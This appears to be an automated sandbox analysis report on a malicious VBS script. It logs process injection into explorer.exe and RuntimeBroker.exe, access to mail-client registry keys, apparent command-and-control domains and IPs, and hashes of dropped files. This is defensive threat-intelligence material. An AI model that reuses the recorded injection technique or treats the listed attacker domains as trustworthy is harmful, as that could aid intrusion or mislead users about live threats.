Source: explorer.exe, 0000001F.00000002.604333034.000000000095C000.00000004.00000020.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G

Source: C:\Windows\System32\control.exe	Memory allocated: C:\Windows\explorer.exe base: 27E0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 21DB7DC0000 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 219109E0000 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 2DACE190000 protect: page execute and read and write

Source: C:\Windows\System32\control.exe	Memory protected: C:\Windows\explorer.exe base: 7FFD88E31580 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory protected: C:\Windows\explorer.exe base: 7FFD88E31580 protect: page execute read	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory protected: C:\Windows\explorer.exe base: 7FFD88E31580 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFD88E31580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFD88E31580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFD88E31580 protect: page execute and read and write

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread created: C:\Windows\explorer.exe EIP: 88E31580	Jump to behavior
Source: C:\Windows\System32\control.exe	Thread created: C:\Windows\explorer.exe EIP: 88E31580	Jump to behavior
Source: C:\Windows\explorer.exe	Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 88E31580
Source: C:\Windows\explorer.exe	Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 88E31580
Source: C:\Windows\explorer.exe	Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 88E31580
Source: C:\Windows\explorer.exe	Thread created: unknown EIP: 88E31580

Analysis Report 6znkPyTAVN7V.vbs

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3440 base: 5E2000 value: 00	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3440 base: 7FFD88E31580 value: EB	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3440 base: A90000 value: 80	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3440 base: 7FFD88E31580 value: 40	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory written: PID: 3440 base: 5E0000 value: 00	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory written: PID: 3440 base: 7FFD88E31580 value: EB	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory written: PID: 3440 base: 27E0000 value: 80	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory written: PID: 3440 base: 7FFD88E31580 value: 40	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\System32\control.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\System32\control.exe	Section loaded: unknown target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: unknown protection: execute and read and write

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: 3440	Jump to behavior
Source: C:\Windows\System32\control.exe	Thread register set: target process: 3440	Jump to behavior
Source: C:\Windows\System32\control.exe	Thread register set: target process: 5688	Jump to behavior
Source: C:\Windows\explorer.exe	Thread register set: target process: 3092
Source: C:\Windows\explorer.exe	Thread register set: target process: 4252
Source: C:\Windows\explorer.exe	Thread register set: target process: 4572
Source: C:\Windows\explorer.exe	Thread register set: target process: 5784

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 5E2000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 7FFD88E31580	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: A90000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 7FFD88E31580	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\explorer.exe base: 5E0000	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\explorer.exe base: 7FFD88E31580	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\explorer.exe base: 27E0000	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\explorer.exe base: 7FFD88E31580	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 515ACF8000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 21DB7DC0000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 789A640000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 219109E0000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: ECB1F28000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2DACE190000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580

Source: explorer.exe, 0000001F.00000000.547723388.00000000083E9000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000001F.00000002.603261741.00000000008B8000.00000004.00000020.sdmp	Binary or memory string: Progman
Source: explorer.exe, 0000001F.00000000.510756620.0000000000EE0000.00000002.00000001.sdmp	Binary or memory string: &Program Manager
Source: explorer.exe, 0000001F.00000000.510756620.0000000000EE0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Ammerman.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Ammerman.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Ammerman.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Ammerman.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Ammerman.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Ammerman.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Ammerman.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Ammerman.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Ammerman.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior

Source: C:\Windows\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Windows\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Name	IP	Active
myip.opendns.com	84.17.52.25	true
c56.lepini.at	47.241.19.44	true
resolver1.opendns.com	208.67.222.222	true
api3.lepini.at	47.241.19.44	true
api10.laptok.at	47.241.19.44	true
g.msn.com	unknown	unknown
222.222.67.208.in-addr.arpa	unknown	unknown

ID:	321068
Product:	CloudBasic
Start time:	10:40:12
Start date:	20.11.2020
Sample:	6znkPyTAVN7V.vbs
Cookbook:	default.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	a5f063ac8cf23a274922a337a8eeac2c
SHA1:	bfae866c96996f9d26ec356ea2b48caa8e2b64d7
SHA256:	2dd9418ae38f181b5901be316cbb0deaa2205b2865a3c391105966b7d48fae2f

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{051BC4BB-2B60-11EB-90E5-ECF4BB2D2496}.dat	Microsoft Word Document	19BC3EF4708F62D0EF88F4CC750E8BA7	847F0156B90A5382B5CB7BAF81809DA4721EFF9F	D941C4626355485C81116B025CBB9E5E813EDBDB16021CB24E3584F58F2EBF3B
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{051BC4BD-2B60-11EB-90E5-ECF4BB2D2496}.dat	Microsoft Word Document	398929AA60398AA5D181919110243250	7EAD10F7AABB2C7BC59A3817D6FD6908139592FC	1B51E92A344ECBB365C469BD3AC2991D634C8D9A03E8137C2160D1E307B535FF
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{051BC4BF-2B60-11EB-90E5-ECF4BB2D2496}.dat	Microsoft Word Document	7058A3DCE7049EBBBB6003433944FB3F	4C0B71D73DE115D17033F254FA07A860881F6EDF	2F098F437682540AC0B3BFF6144A107D05EDCFE8F0027EBCC7E17502059E52D4
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{0B24B6A6-2B60-11EB-90E5-ECF4BB2D2496}.dat	Microsoft Word Document	5E816306E5D3D26558CAFD82367781F6	11F17EE55D9E9288C784C7828739DABFAA1BAA24	89E0C4C9FDB369788750F7233EC044686EE586AC75A5FAE04900801A3D2F21CE
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\1[1].htm	ASCII text, with very long lines, with no line terminators	99911885EF8527B9BB520959D0400D23	A214A86649EBA314D4BF4C1ED2AC48CAC7EEBA1B	6A56806C098AA9CD6ADFD325BE3E9A05FDA817BD175A469A5027339EEA4C9058
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\f[1].htm	ASCII text, with very long lines, with no line terminators	03D61BB1F49164FA9812A5E896C67F3E	85FA697A67481A5631B61FB3F539B4503B929EA1	CDE50C5D8FC8B941FD19E1F70B357635061FBFE6F9A0D5BD4C0CFD9F46BF8436
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\_2B[1].htm	ASCII text, with very long lines, with no line terminators	FC226C805B21348897F9CF750630EBA6	5F20971E026402B862B9A62A6B4CCCE997BFE90E	B2BA15FFD15238328B301C92BC4CB4CA7C5B500826146DBFACB98B261E12FB31
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	data	1F1446CE05A385817C3EF20CBD8B6E6A	1E4B1EE5EFCA361C9FB5DC286DD7A99DEA31F33D	2BCEC12B7B67668569124FED0E0CEF2C1505B742F7AE2CF86C8544D07D59F2CE
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	13AF6BE1CB30E2FB779EA728EE0A6D67	F33581AC2C60B1F02C978D14DC220DCE57CC9562	168561FB18F8EBA8043FA9FC4B8A95B628F2CF5584E5A3B96C9EBAF6DD740E3F
C:\Users\user\AppData\Local\Temp\41myt1z4\41myt1z4.0.cs	UTF-8 Unicode (with BOM) text	D318CFA6F0AA6A796C421A261F345F96	8CC7A3E861751CD586D810AB0747F9C909E7F051	F0AC8098FC8D2D55052F4EA57D9B57E17A7BF211C3B51F261C8194CECB6007E2
C:\Users\user\AppData\Local\Temp\41myt1z4\41myt1z4.cmdline	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators	62CF574F6F27BD70FA832C9D3615E658	6D7F2604FA22B06A7D9CA5C72BCBB5D0B0372628	3AA9072271C8ECC0985290AFA9B6758A1904171649FE2232172701BA51838CC2
C:\Users\user\AppData\Local\Temp\41myt1z4\41myt1z4.dll	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows	AEEDC87EC8E42A44F2F32A2A2313F443	570FCD54C7D8E367412F5EC697871093AC4C30CF	8263A3AB1BFB646FAC0C7CA4A58995C4E23C87777A6950327A649AAC3F6304B2
C:\Users\user\AppData\Local\Temp\41myt1z4\41myt1z4.out	ASCII text, with CRLF, CR line terminators	83B3C9D9190CE2C57B83EEE13A9719DF	ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E	B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
C:\Users\user\AppData\Local\Temp\41myt1z4\CSC9757D2D6F9F84ABABCD57DA7E4EFF939.TMP	MSVC .res	0B5DF18E4A860E71E6F20BBAA7EDC200	A5E11DCFEE908426FC8D2CC8265A428D81D93B37	3E64459C2B5EC8711A64FE922240EFCB129FFA0FD5218521BF75A1576AED178E
C:\Users\user\AppData\Local\Temp\9047.bi1	ASCII text, with CRLF line terminators	1784914AE468F35A55BBAF2A8D746D04	7959C412D18BEBCE89AF9DC3715AA17A703467B1	E32BFF5542AF45D88A381F1F0239906ACC07E086FD4F93D9A057A70D48DF4E1A
C:\Users\user\AppData\Local\Temp\Ammerman.zip	Zip archive data, at least v2.0 to extract	94F926A14F611ED85B2AD7F5C108D930	920C9F8B4B8100DEDA928646DBFABA7D8E7AA6DE	BA9979A733F1226AD56803023880155FECAAEDAB7ABB4DC9552BD674D47FE62F
C:\Users\user\AppData\Local\Temp\FCC.cxx	ASCII text, with no line terminators	1F1A0E8B8B957A4E0A9E76DAD9F94896	CC1DDD54FA942B6731653D8B35C1DB90E6DBBD34	D106B73E76E447E35062AE309FE801B57BBEE7AC193B7ABCF45178ADA7D40BB3
C:\Users\user\AppData\Local\Temp\JavaDeployReg.log	ASCII text, with CRLF line terminators	83BB7DF4CB16AAA1B3D6B986C71B7909	C40F2F24FAF561C88EF13B8BA68B0F8F5B0B7449	F59AA498EFE14AE29D4CC88769725E3C4E22C134666A9A4361479525638B16F3
C:\Users\user\AppData\Local\Temp\RES2F3F.tmp	data	8F5D9D828F62635C334F79A61D6C0EC9	F6025593D6E45245C0777E9EA167D67B544A42D7	0F23EC8C7487380F75F48683DA4DBBAFD7661BD396BD14FC2CDF765957DA82D2
C:\Users\user\AppData\Local\Temp\RES4817.tmp	data	909338495F5A78F05197E239771E4183	2D6668D4BDC9D833A5E65F914663CDC0C855B823	C73584457E6405B6BFB56710CABE96BD4789E88264A961BB285AF673ADBD6B05
C:\Users\user\AppData\Local\Temp\Tolstoy.3gp	ASCII text, with no line terminators	DE116F46B1AB756FE5FC714826D9C77C	C0543E108146A86E97F9C92D84550415FF0D07F6	B83A7A9918FBC774A1CBF2D5C700D86B64D91961728A7BBEC91FF74CE27C6CBA
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dj1ranvb.zfa.psm1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lnjgsc1m.w4a.ps1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\adobe.url	MS Windows 95 Internet shortcut text (URL=<https://adobe.com/>), ASCII text, with CRLF line terminators	99D9EE4F5137B94435D9BF49726E3D7B	4AE65CB58C311B5D5D963334F1C30B0BD84AFC03	F5BC6CF90B739E9C70B6EA13F5445B270D8F5906E199270E22A2F685D989211E
C:\Users\user\AppData\Local\Temp\bowerbird.m3u	ASCII text, with no line terminators	FCA5D5C49A23B8614C6F821ABC873200	C6982C28BD133E0317D388EFDFE29CB78A5AB6BA	9EC7D8CE210B398464E1AE84073DA79284983AEA1AE6AD5985DC77AE95C1C242
C:\Users\user\AppData\Local\Temp\dvgqxizg\CSC2062E18B5949488FB5158C917D4EBA9.TMP	MSVC .res	328DE992FF2AD2CAACCCFBA57EC194FB	FC76DA640D8B6737E1DF09332F142FCF8F5A7976	B5F1DEE9C80A4985561A9E7694B3CAA1EF8E8357591C4ECCEBB0B7F2AE253E76
C:\Users\user\AppData\Local\Temp\dvgqxizg\dvgqxizg.0.cs	UTF-8 Unicode (with BOM) text	216105852331C904BA5D540DE538DD4E	EE80274EBF645987E942277F7E0DE23B51011752	408944434D89B94CE4EB33DD507CA4E0283419FA39E016A5E26F2C827825DDCC
C:\Users\user\AppData\Local\Temp\dvgqxizg\dvgqxizg.cmdline	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators	BFE70A8EFC0C6D5C7D5E124F9302AE9D	A4E065D7783D5D6E638701C8A7DDB3876795B1E1	9E28EA29F0D259C7252BA42E4CA0199A3222BFA5085EC4CE2AC232BB20A3698A
C:\Users\user\AppData\Local\Temp\dvgqxizg\dvgqxizg.dll	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows	31F750C1B782E900AA790FC8F8F06A4E	1DA7C7CBCAC3D41D0C90133ABC47DA3D18E5147D	F10E9A218142A0FE49F9F94B25205EAEF8D8E82A1743B853C128D985DFD31AA9
C:\Users\user\AppData\Local\Temp\dvgqxizg\dvgqxizg.out	ASCII text, with CRLF, CR line terminators	83B3C9D9190CE2C57B83EEE13A9719DF	ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E	B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
C:\Users\user\AppData\Local\Temp\earmark.avchd	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	78B3444199A2932805D85CFDB30AD6FB	A1826A8BDD4AA6FC0BF2157A6063CCA5534A3A46	66EAF5C2BC2EC2A01D74DB9CC50744C748388CD9B0FA1F07181E639E128803EF
C:\Users\user\AppData\Local\Temp\~DF328D11A7A64F8786.TMP	data	F4BF6518BD3CF74605DA74FE34666128	B5DF424C24079565CAC4223587470B2F08368E4D	63D2EEE58E6CE9280235A4029C3F6417CDC9B66A2632FAEFD07F641F8D71687B
C:\Users\user\AppData\Local\Temp\~DF4507009F430A65FB.TMP	data	C63AE9CEF7DCF822882BA6A903353FCA	8645B0F0356DD8DBC3279EF424AAD6090CDE29A2	17C1FEC935BD171FDA952EB0EF98DB432195E17AF7DA94E010FB088CFDBD2809
C:\Users\user\AppData\Local\Temp\~DF7AB9619A808D9562.TMP	data	9CDC130EA877CAF30F714FC0F4847FFA	663DC270EBBF119CB7CA45F3DB7EF3F2231533AE	111945EE51DCADF337BB0BBAE65D4D4593BE6D058201CA6B136F7D1234F4A422
C:\Users\user\AppData\Local\Temp\~DF9087B74C10875442.TMP	data	0FFFA19F99BAE3D2C7D4141D84B80CF3	52754B728BFE6711BD53C31BC11EF5529302028C	27897C0F898362B8BEE9AB8B3D9DB668AC6B06644924C917D1A3FF5B62F077B7
C:\Users\user\AppData\Roaming\Microsoft\{FC666F93-2B96-8EB5-95F0-8FA2992433F6}	ASCII text, with CRLF line terminators	FE9A928D2858CCB002C62322A615F6C8	BE661F6A4B947D812454C7613EB0B7EBA8DAC1BA	5FF39D5B7A499B46D34AFCCA61A637387B4350FDF94A78686DDE3E8D1EF966A5
C:\Users\user\Documents\20201120\PowerShell_transcript.721680.7AKpz66j.20201120104203.txt	UTF-8 Unicode (with BOM) text, with CRLF line terminators	EBC40964BB846A904D81A4D87321E8FB	A6E79A6A03B3AE0F3F76903AD30067161AF3D79F	0ED287058151775FA678C2D8064DE2A95189185F13F5E7EF93FB514982DBF1D9
\Device\ConDrv	ASCII text, with CRLF, CR line terminators	D796BA3AE0C072AA0E189083C7E8C308	ABB1B68758B9C2BF43018A4AEAE2F2E72B626482	EF17537B7CAAB3B16493F11A099F3192D5DCD911C1E8DF0F68FE4AB6531FB43E